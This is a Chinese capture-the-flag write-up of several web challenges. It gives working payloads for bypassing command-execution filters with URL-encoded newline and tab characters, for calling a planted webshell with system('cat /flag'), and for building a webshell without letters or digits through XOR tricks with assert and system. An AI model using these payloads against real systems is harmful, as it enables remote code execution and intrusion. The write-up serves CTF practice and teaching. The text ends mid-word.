文章目录
命令执行之我在干什么
换行绕过strstr,%09绕空格
a=yyds%0als%09/
看见flag在根目录,但是过滤了*和flag
用正则
?a=yyds%0Anl%09/fla[g]
签到题
源代码
webshell
网站被黑了,发现robots.txt,访问里面的地址,源代码有个aGFja2Vy
base解码得到hacker
于是传
webshe11.php?hacker=system('cat /flag');
其次,我发现扫描有一个1.txt,直接访问就是flag,应该是哪位好心人写的。
所以我也好心的删掉了。
无字符webshell
过滤A-Za-z0-9
参考浅析无字符数字构造webshell
采用里面的异或,即
$_="`{
{
{"^"?<>/";${$_}[_](${$_}[__]);
#$_GET[_]($_GET[__])
于是得到最终payload
?cmd=$_="`{
{
{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=system('tac /flag');
当然如果你是在我写wp之前做的,你会发现这道题直接访问flag.txt就可以拿到flag了,而我看我以前的payload是tac f111ag。
为了继续当好心人,我就好心的mv flag.txt /flag,这样大家就能学习到无字符webs